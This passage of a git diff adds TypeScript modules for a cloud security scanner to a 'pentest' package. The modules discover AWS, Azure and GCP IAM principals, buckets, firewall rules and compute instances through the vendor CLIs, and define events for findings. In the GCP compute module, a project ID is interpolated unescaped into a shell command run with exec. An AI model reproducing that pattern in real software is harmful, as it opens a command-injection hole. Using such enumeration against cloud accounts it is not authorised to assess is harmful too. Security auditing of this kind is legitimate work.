+      return "Logging and Monitoring"
+    return "General"
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/discovery.ts b/packages/opencode/src/pentest/cloudscan/discovery.ts
new file mode 100644
index 00000000000..a2528fac6ce
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/discovery.ts
@@ -0,0 +1,708 @@
+/**
+ * @fileoverview Cloud Resource Discovery
+ *
+ * Discovers and enumerates cloud resources across providers.
+ *
+ * @module pentest/cloudscan/discovery
+ */
+
+import { CloudScanTypes } from "./types"
+import { CloudScanEvents } from "./events"
+import { Bus } from "../../bus"
+import { Log } from "../../util/log"
+import { exec } from "child_process"
+import { promisify } from "util"
+
+const execAsync = promisify(exec)
+
+// Provider modules
+import { AWSIAM, AWSS3, AWSSecurityGroups, AWSEC2, AWSLambda } from "./aws"
+import { AzureRBAC, AzureStorage, AzureNSG, AzureVM } from "./azure"
+import { GCPIAM, GCPGCS, GCPFirewall, GCPCompute } from "./gcp"
+
+const log = Log.create({ service: "cloudscan.discovery" })
+
+/**
+ * Discovery options.
+ */
+export interface DiscoveryOptions {
+  provider: CloudScanTypes.CloudProvider
+  regions?: string[]
+  resourceTypes?: CloudScanTypes.ResourceType[]
+  timeout?: number
+  // Provider-specific options
+  awsProfile?: string
+  azureSubscription?: string
+  gcpProject?: string
+}
+
+/**
+ * Discovery result.
+ */
+export interface DiscoveryResult {
+  provider: CloudScanTypes.CloudProvider
+  regions: string[]
+  resources: {
+    iam: {
+      users: CloudScanTypes.IAMPrincipal[]
+      roles: CloudScanTypes.IAMRole[]
+      policies: CloudScanTypes.IAMPolicy[]
+    }
+    storage: CloudScanTypes.StorageBucket[]
+    network: {
+      securityGroups: CloudScanTypes.SecurityGroup[]
+      vpcs: CloudScanTypes.VirtualNetwork[]
+    }
+    compute: {
+      instances: CloudScanTypes.ComputeInstance[]
+      functions: CloudScanTypes.ServerlessFunction[]
+    }
+  }
+  summary: {
+    totalResources: number
+    byType: Record<string, number>
+    byRegion: Record<string, number>
+  }
+  errors: string[]
+}
+
+/**
+ * CloudDiscovery namespace.
+ */
+export namespace CloudDiscovery {
+  /**
+   * Discover all resources for a provider.
+   */
+  export async function discover(
+    scanID: string,
+    options: DiscoveryOptions
+  ): Promise<DiscoveryResult> {
+    const result: DiscoveryResult = {
+      provider: options.provider,
+      regions: options.regions || [],
+      resources: {
+        iam: { users: [], roles: [], policies: [] },
+        storage: [],
+        network: { securityGroups: [], vpcs: [] },
+        compute: { instances: [], functions: [] },
+      },
+      summary: {
+        totalResources: 0,
+        byType: {},
+        byRegion: {},
+      },
+      errors: [],
+    }
+
+    Bus.publish(CloudScanEvents.DiscoveryStarted, {
+      scanID,
+      provider: options.provider,
+      regions: options.regions || ["all"],
+    })
+
+    try {
+      switch (options.provider) {
+        case "aws":
+          await discoverAWS(scanID, result, options)
+          break
+        case "azure":
+          await discoverAzure(scanID, result, options)
+          break
+        case "gcp":
+          await discoverGCP(scanID, result, options)
+          break
+      }
+
+      // Calculate summary
+      calculateSummary(result)
+
+      Bus.publish(CloudScanEvents.DiscoveryCompleted, {
+        scanID,
+        provider: options.provider,
+        resourceCount: result.summary.totalResources,
+        duration: 0,
+      })
+    } catch (err) {
+      const error = `Discovery failed: ${String(err)}`
+      result.errors.push(error)
+      log.error(error, { provider: options.provider })
+    }
+
+    return result
+  }
+
+  /**
+   * Discover specific resource types.
+   */
+  export async function discoverResourceTypes(
+    scanID: string,
+    options: DiscoveryOptions & { resourceTypes: CloudScanTypes.ResourceType[] }
+  ): Promise<DiscoveryResult> {
+    const result: DiscoveryResult = {
+      provider: options.provider,
+      regions: options.regions || [],
+      resources: {
+        iam: { users: [], roles: [], policies: [] },
+        storage: [],
+        network: { securityGroups: [], vpcs: [] },
+        compute: { instances: [], functions: [] },
+      },
+      summary: {
+        totalResources: 0,
+        byType: {},
+        byRegion: {},
+      },
+      errors: [],
+    }
+
+    for (const resourceType of options.resourceTypes) {
+      try {
+        switch (resourceType) {
+          case "user":
+          case "role":
+          case "policy":
+          case "service-account":
+            await discoverIAM(scanID, result, options)
+            break
+          case "bucket":
+            await discoverStorage(scanID, result, options)
+            break
+          case "security-group":
+          case "vpc":
+            await discoverNetwork(scanID, result, options)
+            break
+          case "instance":
+          case "function":
+            await discoverCompute(scanID, result, options)
+            break
+        }
+      } catch (err) {
+        result.errors.push(`Failed to discover ${resourceType}: ${String(err)}`)
+      }
+    }
+
+    calculateSummary(result)
+    return result
+  }
+
+  /**
+   * Check if CLI tools are available.
+   */
+  export async function checkPrerequisites(
+    provider: CloudScanTypes.CloudProvider
+  ): Promise<{
+    available: boolean
+    cliInstalled: boolean
+    authenticated: boolean
+    errors: string[]
+  }> {
+    const result = {
+      available: false,
+      cliInstalled: false,
+      authenticated: false,
+      errors: [] as string[],
+    }
+
+    try {
+      switch (provider) {
+        case "aws":
+          await checkAWSPrerequisites(result)
+          break
+        case "azure":
+          await checkAzurePrerequisites(result)
+          break
+        case "gcp":
+          await checkGCPPrerequisites(result)
+          break
+      }
+
+      result.available = result.cliInstalled && result.authenticated
+    } catch (err) {
+      result.errors.push(String(err))
+    }
+
+    return result
+  }
+
+  /**
+   * Get available regions for a provider.
+   */
+  export async function getRegions(
+    provider: CloudScanTypes.CloudProvider
+  ): Promise<string[]> {
+    try {
+      switch (provider) {
+        case "aws":
+          return await getAWSRegions()
+        case "azure":
+          return await getAzureRegions()
+        case "gcp":
+          return await getGCPRegions()
+        default:
+          return []
+      }
+    } catch (err) {
+      log.debug("Failed to get regions", { provider, error: String(err) })
+      return []
+    }
+  }
+
+  // ========== AWS Discovery ==========
+
+  async function discoverAWS(
+    scanID: string,
+    result: DiscoveryResult,
+    options: DiscoveryOptions
+  ): Promise<void> {
+    const awsOptions = {
+      profile: options.awsProfile,
+      region: options.regions?.[0],
+      timeout: options.timeout,
+    }
+
+    // Discover IAM (global)
+    log.info("Discovering AWS IAM resources")
+    try {
+      const iamResult = await AWSIAM.enumerate(scanID, awsOptions)
+      result.resources.iam.users = iamResult.users
+      result.resources.iam.roles = iamResult.roles
+      result.resources.iam.policies = iamResult.policies
+    } catch (err) {
+      result.errors.push(`AWS IAM: ${String(err)}`)
+    }
+
+    // Discover S3 (global)
+    log.info("Discovering AWS S3 buckets")
+    try {
+      const s3Result = await AWSS3.enumerate(scanID, awsOptions)
+      result.resources.storage = s3Result.buckets
+    } catch (err) {
+      result.errors.push(`AWS S3: ${String(err)}`)
+    }
+
+    // Discover per region
+    const regions = options.regions || ["us-east-1"]
+    for (const region of regions) {
+      const regionOptions = { ...awsOptions, region }
+
+      // Security Groups
+      log.info("Discovering AWS security groups", { region })
+      try {
+        const sgResult = await AWSSecurityGroups.enumerate(scanID, regionOptions)
+        result.resources.network.securityGroups.push(...sgResult.securityGroups)
+      } catch (err) {
+        result.errors.push(`AWS SG (${region}): ${String(err)}`)
+      }
+
+      // EC2
+      log.info("Discovering AWS EC2 instances", { region })
+      try {
+        const ec2Result = await AWSEC2.enumerate(scanID, regionOptions)
+        result.resources.compute.instances.push(...ec2Result.instances)
+      } catch (err) {
+        result.errors.push(`AWS EC2 (${region}): ${String(err)}`)
+      }
+
+      // Lambda
+      log.info("Discovering AWS Lambda functions", { region })
+      try {
+        const lambdaResult = await AWSLambda.enumerate(scanID, regionOptions)
+        result.resources.compute.functions.push(...lambdaResult.functions)
+      } catch (err) {
+        result.errors.push(`AWS Lambda (${region}): ${String(err)}`)
+      }
+    }
+
+    result.regions = regions
+  }
+
+  // ========== Azure Discovery ==========
+
+  async function discoverAzure(
+    scanID: string,
+    result: DiscoveryResult,
+    options: DiscoveryOptions
+  ): Promise<void> {
+    const azureOptions = {
+      subscriptionId: options.azureSubscription,
+      timeout: options.timeout,
+    }
+
+    // Discover RBAC
+    log.info("Discovering Azure RBAC")
+    try {
+      const rbacResult = await AzureRBAC.enumerate(scanID, azureOptions)
+      result.resources.iam.users = rbacResult.users
+      result.resources.iam.roles = rbacResult.roles
+    } catch (err) {
+      result.errors.push(`Azure RBAC: ${String(err)}`)
+    }
+
+    // Discover Storage
+    log.info("Discovering Azure Storage accounts")
+    try {
+      const storageResult = await AzureStorage.enumerate(scanID, azureOptions)
+      result.resources.storage = storageResult.storageAccounts
+    } catch (err) {
+      result.errors.push(`Azure Storage: ${String(err)}`)
+    }
+
+    // Discover NSG
+    log.info("Discovering Azure NSGs")
+    try {
+      const nsgResult = await AzureNSG.enumerate(scanID, azureOptions)
+      result.resources.network.securityGroups = nsgResult.nsgs
+      result.resources.network.vpcs = nsgResult.vnets
+    } catch (err) {
+      result.errors.push(`Azure NSG: ${String(err)}`)
+    }
+
+    // Discover VMs
+    log.info("Discovering Azure VMs")
+    try {
+      const vmResult = await AzureVM.enumerate(scanID, azureOptions)
+      result.resources.compute.instances = vmResult.vms
+      result.resources.compute.functions = vmResult.functions
+    } catch (err) {
+      result.errors.push(`Azure VM: ${String(err)}`)
+    }
+  }
+
+  // ========== GCP Discovery ==========
+
+  async function discoverGCP(
+    scanID: string,
+    result: DiscoveryResult,
+    options: DiscoveryOptions
+  ): Promise<void> {
+    const gcpOptions = {
+      projectId: options.gcpProject,
+      timeout: options.timeout,
+    }
+
+    // Discover IAM
+    log.info("Discovering GCP IAM")
+    try {
+      const iamResult = await GCPIAM.enumerate(scanID, gcpOptions)
+      result.resources.iam.users = iamResult.serviceAccounts
+      result.resources.iam.roles = iamResult.customRoles
+    } catch (err) {
+      result.errors.push(`GCP IAM: ${String(err)}`)
+    }
+
+    // Discover GCS
+    log.info("Discovering GCP Cloud Storage")
+    try {
+      const gcsResult = await GCPGCS.enumerate(scanID, gcpOptions)
+      result.resources.storage = gcsResult.buckets
+    } catch (err) {
+      result.errors.push(`GCP GCS: ${String(err)}`)
+    }
+
+    // Discover Firewall
+    log.info("Discovering GCP Firewall rules")
+    try {
+      const fwResult = await GCPFirewall.enumerate(scanID, gcpOptions)
+      result.resources.network.securityGroups = fwResult.firewallRules
+      result.resources.network.vpcs = fwResult.vpcs
+    } catch (err) {
+      result.errors.push(`GCP Firewall: ${String(err)}`)
+    }
+
+    // Discover Compute
+    log.info("Discovering GCP Compute resources")
+    try {
+      const computeResult = await GCPCompute.enumerate(scanID, gcpOptions)
+      result.resources.compute.instances = computeResult.instances
+      result.resources.compute.functions = computeResult.functions
+    } catch (err) {
+      result.errors.push(`GCP Compute: ${String(err)}`)
+    }
+  }
+
+  // ========== Type-specific Discovery ==========
+
+  async function discoverIAM(
+    scanID: string,
+    result: DiscoveryResult,
+    options: DiscoveryOptions
+  ): Promise<void> {
+    switch (options.provider) {
+      case "aws": {
+        const iamResult = await AWSIAM.enumerate(scanID, {
+          profile: options.awsProfile,
+          timeout: options.timeout,
+        })
+        result.resources.iam.users = iamResult.users
+        result.resources.iam.roles = iamResult.roles
+        result.resources.iam.policies = iamResult.policies
+        break
+      }
+      case "azure": {
+        const rbacResult = await AzureRBAC.enumerate(scanID, {
+          subscriptionId: options.azureSubscription,
+          timeout: options.timeout,
+        })
+        result.resources.iam.users = rbacResult.users
+        result.resources.iam.roles = rbacResult.roles
+        break
+      }
+      case "gcp": {
+        const iamResult = await GCPIAM.enumerate(scanID, {
+          projectId: options.gcpProject,
+          timeout: options.timeout,
+        })
+        result.resources.iam.users = iamResult.serviceAccounts
+        result.resources.iam.roles = iamResult.customRoles
+        break
+      }
+    }
+  }
+
+  async function discoverStorage(
+    scanID: string,
+    result: DiscoveryResult,
+    options: DiscoveryOptions
+  ): Promise<void> {
+    switch (options.provider) {
+      case "aws": {
+        const s3Result = await AWSS3.enumerate(scanID, {
+          profile: options.awsProfile,
+          timeout: options.timeout,
+        })
+        result.resources.storage = s3Result.buckets
+        break
+      }
+      case "azure": {
+        const storageResult = await AzureStorage.enumerate(scanID, {
+          subscriptionId: options.azureSubscription,
+          timeout: options.timeout,
+        })
+        result.resources.storage = storageResult.storageAccounts
+        break
+      }
+      case "gcp": {
+        const gcsResult = await GCPGCS.enumerate(scanID, {
+          projectId: options.gcpProject,
+          timeout: options.timeout,
+        })
+        result.resources.storage = gcsResult.buckets
+        break
+      }
+    }
+  }
+
+  async function discoverNetwork(
+    scanID: string,
+    result: DiscoveryResult,
+    options: DiscoveryOptions
+  ): Promise<void> {
+    switch (options.provider) {
+      case "aws": {
+        const sgResult = await AWSSecurityGroups.enumerate(scanID, {
+          profile: options.awsProfile,
+          region: options.regions?.[0],
+          timeout: options.timeout,
+        })
+        result.resources.network.securityGroups = sgResult.securityGroups
+        break
+      }
+      case "azure": {
+        const nsgResult = await AzureNSG.enumerate(scanID, {
+          subscriptionId: options.azureSubscription,
+          timeout: options.timeout,
+        })
+        result.resources.network.securityGroups = nsgResult.nsgs
+        result.resources.network.vpcs = nsgResult.vnets
+        break
+      }
+      case "gcp": {
+        const fwResult = await GCPFirewall.enumerate(scanID, {
+          projectId: options.gcpProject,
+          timeout: options.timeout,
+        })
+        result.resources.network.securityGroups = fwResult.firewallRules
+        result.resources.network.vpcs = fwResult.vpcs
+        break
+      }
+    }
+  }
+
+  async function discoverCompute(
+    scanID: string,
+    result: DiscoveryResult,
+    options: DiscoveryOptions
+  ): Promise<void> {
+    switch (options.provider) {
+      case "aws": {
+        const ec2Result = await AWSEC2.enumerate(scanID, {
+          profile: options.awsProfile,
+          region: options.regions?.[0],
+          timeout: options.timeout,
+        })
+        result.resources.compute.instances = ec2Result.instances
+
+        const lambdaResult = await AWSLambda.enumerate(scanID, {
+          profile: options.awsProfile,
+          region: options.regions?.[0],
+          timeout: options.timeout,
+        })
+        result.resources.compute.functions = lambdaResult.functions
+        break
+      }
+      case "azure": {
+        const vmResult = await AzureVM.enumerate(scanID, {
+          subscriptionId: options.azureSubscription,
+          timeout: options.timeout,
+        })
+        result.resources.compute.instances = vmResult.vms
+        result.resources.compute.functions = vmResult.functions
+        break
+      }
+      case "gcp": {
+        const computeResult = await GCPCompute.enumerate(scanID, {
+          projectId: options.gcpProject,
+          timeout: options.timeout,
+        })
+        result.resources.compute.instances = computeResult.instances
+        result.resources.compute.functions = computeResult.functions
+        break
+      }
+    }
+  }
+
+  // ========== Prerequisites Checks ==========
+
+  async function checkAWSPrerequisites(result: {
+    cliInstalled: boolean
+    authenticated: boolean
+    errors: string[]
+  }): Promise<void> {
+    try {
+      await execAsync("which aws")
+      result.cliInstalled = true
+    } catch {
+      result.errors.push("AWS CLI not installed")
+      return
+    }
+
+    try {
+      await execAsync("aws sts get-caller-identity")
+      result.authenticated = true
+    } catch {
+      result.errors.push("AWS CLI not authenticated")
+    }
+  }
+
+  async function checkAzurePrerequisites(result: {
+    cliInstalled: boolean
+    authenticated: boolean
+    errors: string[]
+  }): Promise<void> {
+    try {
+      await execAsync("which az")
+      result.cliInstalled = true
+    } catch {
+      result.errors.push("Azure CLI not installed")
+      return
+    }
+
+    try {
+      await execAsync("az account show")
+      result.authenticated = true
+    } catch {
+      result.errors.push("Azure CLI not authenticated")
+    }
+  }
+
+  async function checkGCPPrerequisites(result: {
+    cliInstalled: boolean
+    authenticated: boolean
+    errors: string[]
+  }): Promise<void> {
+    try {
+      await execAsync("which gcloud")
+      result.cliInstalled = true
+    } catch {
+      result.errors.push("gcloud CLI not installed")
+      return
+    }
+
+    try {
+      await execAsync('gcloud auth list --filter=status:ACTIVE --format="value(account)"')
+      result.authenticated = true
+    } catch {
+      result.errors.push("gcloud CLI not authenticated")
+    }
+  }
+
+  // ========== Region Helpers ==========
+
+  async function getAWSRegions(): Promise<string[]> {
+    try {
+      const { stdout } = await execAsync('aws ec2 describe-regions --query "Regions[].RegionName" --output text')
+      return stdout.trim().split(/\s+/)
+    } catch {
+      return [
+        "us-east-1", "us-east-2", "us-west-1", "us-west-2",
+        "eu-west-1", "eu-west-2", "eu-central-1",
+        "ap-northeast-1", "ap-southeast-1", "ap-southeast-2",
+      ]
+    }
+  }
+
+  async function getAzureRegions(): Promise<string[]> {
+    try {
+      const { stdout } = await execAsync('az account list-locations --query "[].name" -o tsv')
+      return stdout.trim().split("\n").filter(Boolean)
+    } catch {
+      return [
+        "eastus", "eastus2", "westus", "westus2",
+        "northeurope", "westeurope", "uksouth",
+        "eastasia", "southeastasia", "japaneast",
+      ]
+    }
+  }
+
+  async function getGCPRegions(): Promise<string[]> {
+    try {
+      const { stdout } = await execAsync('gcloud compute regions list --format="value(name)"')
+      return stdout.trim().split("\n").filter(Boolean)
+    } catch {
+      return [
+        "us-central1", "us-east1", "us-west1",
+        "europe-west1", "europe-west2", "europe-west3",
+        "asia-east1", "asia-southeast1", "asia-northeast1",
+      ]
+    }
+  }
+
+  // ========== Summary ==========
+
+  function calculateSummary(result: DiscoveryResult): void {
+    const { resources, summary } = result
+
+    // Count by type
+    summary.byType["users"] = resources.iam.users.length
+    summary.byType["roles"] = resources.iam.roles.length
+    summary.byType["policies"] = resources.iam.policies.length
+    summary.byType["buckets"] = resources.storage.length
+    summary.byType["security-groups"] = resources.network.securityGroups.length
+    summary.byType["vpcs"] = resources.network.vpcs.length
+    summary.byType["instances"] = resources.compute.instances.length
+    summary.byType["functions"] = resources.compute.functions.length
+
+    // Total
+    summary.totalResources = Object.values(summary.byType).reduce((a, b) => a + b, 0)
+
+    // Count by region
+    for (const instance of resources.compute.instances) {
+      const region = instance.region || "global"
+      summary.byRegion[region] = (summary.byRegion[region] || 0) + 1
+    }
+    for (const bucket of resources.storage) {
+      const region = bucket.region || "global"
+      summary.byRegion[region] = (summary.byRegion[region] || 0) + 1
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/events.ts b/packages/opencode/src/pentest/cloudscan/events.ts
new file mode 100644
index 00000000000..650288ef636
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/events.ts
@@ -0,0 +1,387 @@
+/**
+ * @fileoverview Cloud Scanner Events
+ *
+ * Bus event definitions for cloud security scanning operations.
+ *
+ * @module pentest/cloudscan/events
+ */
+
+import z from "zod"
+import { BusEvent } from "../../bus/bus-event"
+
+/**
+ * Cloud scanner events namespace.
+ */
+export namespace CloudScanEvents {
+  /**
+   * Cloud scan started.
+   */
+  export const ScanStarted = BusEvent.define(
+    "pentest.cloudscan.scan_started",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      region: z.string().optional(),
+      account: z.string().optional(),
+      profile: z.string(),
+      modules: z.array(z.string()),
+    })
+  )
+
+  /**
+   * Cloud resource discovered.
+   */
+  export const ResourceDiscovered = BusEvent.define(
+    "pentest.cloudscan.resource_discovered",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      resourceType: z.string(),
+      resourceId: z.string(),
+      resourceName: z.string(),
+      region: z.string().optional(),
+    })
+  )
+
+  /**
+   * IAM user discovered.
+   */
+  export const IAMUserFound = BusEvent.define(
+    "pentest.cloudscan.iam_user_found",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      userName: z.string(),
+      userId: z.string().optional(),
+      mfaEnabled: z.boolean(),
+      accessKeyCount: z.number(),
+      hasConsoleAccess: z.boolean(),
+    })
+  )
+
+  /**
+   * IAM role discovered.
+   */
+  export const IAMRoleFound = BusEvent.define(
+    "pentest.cloudscan.iam_role_found",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      roleName: z.string(),
+      roleArn: z.string().optional(),
+      trustedEntities: z.number(),
+      isServiceLinked: z.boolean(),
+    })
+  )
+
+  /**
+   * IAM policy issue found.
+   */
+  export const IAMPolicyIssue = BusEvent.define(
+    "pentest.cloudscan.iam_policy_issue",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      policyName: z.string(),
+      policyArn: z.string().optional(),
+      issue: z.string(),
+      severity: z.enum(["critical", "high", "medium", "low", "info"]),
+    })
+  )
+
+  /**
+   * Storage bucket discovered.
+   */
+  export const BucketFound = BusEvent.define(
+    "pentest.cloudscan.bucket_found",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      bucketName: z.string(),
+      region: z.string().optional(),
+      isPublic: z.boolean(),
+      hasEncryption: z.boolean(),
+      hasVersioning: z.boolean(),
+    })
+  )
+
+  /**
+   * Public bucket detected.
+   */
+  export const PublicBucketFound = BusEvent.define(
+    "pentest.cloudscan.public_bucket_found",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      bucketName: z.string(),
+      bucketArn: z.string().optional(),
+      accessLevel: z.string(),
+      reason: z.string(),
+    })
+  )
+
+  /**
+   * Security group discovered.
+   */
+  export const SecurityGroupFound = BusEvent.define(
+    "pentest.cloudscan.security_group_found",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      groupId: z.string(),
+      groupName: z.string(),
+      vpcId: z.string().optional(),
+      ruleCount: z.number(),
+      hasPublicIngress: z.boolean(),
+    })
+  )
+
+  /**
+   * Insecure security group rule found.
+   */
+  export const InsecureRuleFound = BusEvent.define(
+    "pentest.cloudscan.insecure_rule_found",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      groupId: z.string(),
+      groupName: z.string(),
+      direction: z.enum(["inbound", "outbound"]),
+      protocol: z.string(),
+      port: z.string(),
+      source: z.string(),
+      issue: z.string(),
+    })
+  )
+
+  /**
+   * Compute instance discovered.
+   */
+  export const InstanceFound = BusEvent.define(
+    "pentest.cloudscan.instance_found",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      instanceId: z.string(),
+      instanceName: z.string().optional(),
+      instanceType: z.string().optional(),
+      state: z.string(),
+      isPublic: z.boolean(),
+      region: z.string().optional(),
+    })
+  )
+
+  /**
+   * Serverless function discovered.
+   */
+  export const FunctionFound = BusEvent.define(
+    "pentest.cloudscan.function_found",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      functionName: z.string(),
+      functionArn: z.string().optional(),
+      runtime: z.string().optional(),
+      isPublic: z.boolean(),
+      hasVpcConfig: z.boolean(),
+    })
+  )
+
+  /**
+   * Compliance check result.
+   */
+  export const ComplianceCheckResult = BusEvent.define(
+    "pentest.cloudscan.compliance_check_result",
+    z.object({
+      scanID: z.string(),
+      framework: z.string(),
+      controlId: z.string(),
+      controlTitle: z.string(),
+      status: z.enum(["passed", "failed", "warning", "skipped"]),
+      severity: z.string(),
+      resourceId: z.string().optional(),
+    })
+  )
+
+  /**
+   * Security finding detected.
+   */
+  export const FindingDetected = BusEvent.define(
+    "pentest.cloudscan.finding_detected",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      findingId: z.string(),
+      title: z.string(),
+      severity: z.enum(["critical", "high", "medium", "low", "info"]),
+      category: z.string(),
+      resourceType: z.string().optional(),
+      resourceId: z.string().optional(),
+    })
+  )
+
+  /**
+   * Prowler scan started.
+   */
+  export const ProwlerStarted = BusEvent.define(
+    "pentest.cloudscan.prowler_started",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      region: z.string().optional(),
+      categories: z.array(z.string()).optional(),
+    })
+  )
+
+  /**
+   * Prowler scan completed.
+   */
+  export const ProwlerCompleted = BusEvent.define(
+    "pentest.cloudscan.prowler_completed",
+    z.object({
+      scanID: z.string(),
+      passed: z.number(),
+      failed: z.number(),
+      duration: z.number(),
+    })
+  )
+
+  /**
+   * ScoutSuite scan started.
+   */
+  export const ScoutSuiteStarted = BusEvent.define(
+    "pentest.cloudscan.scoutsuite_started",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+    })
+  )
+
+  /**
+   * ScoutSuite scan completed.
+   */
+  export const ScoutSuiteCompleted = BusEvent.define(
+    "pentest.cloudscan.scoutsuite_completed",
+    z.object({
+      scanID: z.string(),
+      dangerCount: z.number(),
+      warningCount: z.number(),
+      infoCount: z.number(),
+      duration: z.number(),
+    })
+  )
+
+  /**
+   * Scan progress update.
+   */
+  export const ScanProgress = BusEvent.define(
+    "pentest.cloudscan.scan_progress",
+    z.object({
+      scanID: z.string(),
+      module: z.string(),
+      resourcesScanned: z.number(),
+      totalResources: z.number(),
+      percentComplete: z.number(),
+    })
+  )
+
+  /**
+   * Scan completed successfully.
+   */
+  export const ScanCompleted = BusEvent.define(
+    "pentest.cloudscan.scan_completed",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      profile: z.string(),
+      resourcesDiscovered: z.number(),
+      findingsCount: z.number(),
+      criticalCount: z.number(),
+      highCount: z.number(),
+      duration: z.number(),
+      status: z.enum(["completed", "stopped", "partial"]),
+    })
+  )
+
+  /**
+   * Scan failed.
+   */
+  export const ScanFailed = BusEvent.define(
+    "pentest.cloudscan.scan_failed",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      error: z.string(),
+      module: z.string().optional(),
+    })
+  )
+
+  /**
+   * Discovery started.
+   */
+  export const DiscoveryStarted = BusEvent.define(
+    "pentest.cloudscan.discovery_started",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      regions: z.array(z.string()).optional(),
+    })
+  )
+
+  /**
+   * Discovery completed.
+   */
+  export const DiscoveryCompleted = BusEvent.define(
+    "pentest.cloudscan.discovery_completed",
+    z.object({
+      scanID: z.string(),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      resourceCount: z.number(),
+      duration: z.number(),
+    })
+  )
+
+  /**
+   * Compliance violation found.
+   */
+  export const ComplianceViolation = BusEvent.define(
+    "pentest.cloudscan.compliance_violation",
+    z.object({
+      scanID: z.string(),
+      framework: z.string(),
+      controlId: z.string(),
+      title: z.string(),
+      severity: z.enum(["critical", "high", "medium", "low", "info"]),
+      resourceType: z.string().optional(),
+      resourceId: z.string().optional(),
+    })
+  )
+
+  /**
+   * Compliance check complete.
+   */
+  export const ComplianceComplete = BusEvent.define(
+    "pentest.cloudscan.compliance_complete",
+    z.object({
+      scanID: z.string(),
+      framework: z.string(),
+      passed: z.number(),
+      failed: z.number(),
+      score: z.number(),
+    })
+  )
+
+  /**
+   * External tool completed.
+   */
+  export const ExternalToolCompleted = BusEvent.define(
+    "pentest.cloudscan.external_tool_completed",
+    z.object({
+      scanID: z.string(),
+      tool: z.enum(["prowler", "scoutsuite"]),
+      provider: z.enum(["aws", "azure", "gcp"]),
+      findingsCount: z.number(),
+      duration: z.number(),
+    })
+  )
+}
diff --git a/packages/opencode/src/pentest/cloudscan/gcp/compute.ts b/packages/opencode/src/pentest/cloudscan/gcp/compute.ts
new file mode 100644
index 00000000000..f32e33e9836
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/gcp/compute.ts
@@ -0,0 +1,409 @@
+/**
+ * @fileoverview GCP Compute Analysis
+ *
+ * GCE instance and Cloud Functions enumeration and security analysis.
+ *
+ * @module pentest/cloudscan/gcp/compute
+ */
+
+import { CloudScanTypes } from "../types"
+import { CloudScanEvents } from "../events"
+import { GCloudParser } from "../parsers/gcloud"
+import { Bus } from "../../../bus"
+import { Log } from "../../../util/log"
+import { exec } from "child_process"
+import { promisify } from "util"
+
+const execAsync = promisify(exec)
+
+const log = Log.create({ service: "cloudscan.gcp.compute" })
+
+/**
+ * GCP Compute options.
+ */
+export interface GCPComputeOptions {
+  projectId?: string
+  zone?: string
+  timeout?: number
+}
+
+/**
+ * GCP Compute result.
+ */
+export interface GCPComputeResult {
+  instances: CloudScanTypes.ComputeInstance[]
+  functions: CloudScanTypes.ServerlessFunction[]
+  findings: string[]
+  issues: CloudScanTypes.CloudFinding[]
+}
+
+/**
+ * GCP Compute namespace.
+ */
+export namespace GCPCompute {
+  /**
+   * Enumerate all compute resources.
+   */
+  export async function enumerate(
+    scanID: string,
+    options: GCPComputeOptions = {}
+  ): Promise<GCPComputeResult> {
+    const result: GCPComputeResult = {
+      instances: [],
+      functions: [],
+      findings: [],
+      issues: [],
+    }
+
+    const projectFlag = options.projectId ? `--project ${options.projectId}` : ""
+
+    try {
+      // Enumerate GCE instances
+      log.info("Enumerating GCE instances")
+      const instancesOutput = await runGCloudCommand(
+        `gcloud compute instances list ${projectFlag} --format json`,
+        options.timeout
+      )
+
+      if (instancesOutput) {
+        result.instances = GCloudParser.parseInstances(instancesOutput)
+        result.findings.push(`Found ${result.instances.length} GCE instances`)
+
+        for (const instance of result.instances) {
+          Bus.publish(CloudScanEvents.InstanceFound, {
+            scanID,
+            provider: "gcp",
+            instanceId: instance.id,
+            instanceName: instance.name,
+            instanceType: instance.instanceType,
+            state: instance.state,
+            isPublic: instance.publiclyAccessible,
+            region: instance.region,
+          })
+        }
+      }
+
+      // Enumerate Cloud Functions
+      log.info("Enumerating Cloud Functions")
+      const functionsOutput = await runGCloudCommand(
+        `gcloud functions list ${projectFlag} --format json`,
+        options.timeout
+      )
+
+      if (functionsOutput) {
+        result.functions = GCloudParser.parseCloudFunctions(functionsOutput)
+
+        // Enrich with IAM policy
+        for (const fn of result.functions) {
+          await enrichFunctionDetails(fn, projectFlag, options.timeout)
+
+          Bus.publish(CloudScanEvents.FunctionFound, {
+            scanID,
+            provider: "gcp",
+            functionName: fn.name,
+            functionArn: fn.arn,
+            runtime: fn.runtime,
+            isPublic: fn.publiclyAccessible,
+            hasVpcConfig: !!fn.vpcConfig,
+          })
+        }
+
+        result.findings.push(`Found ${result.functions.length} Cloud Functions`)
+      }
+
+      // Analyze for security issues
+      result.issues = analyzeComputeSecurity(scanID, result)
+
+    } catch (err) {
+      log.error("GCP compute enumeration failed", { error: String(err) })
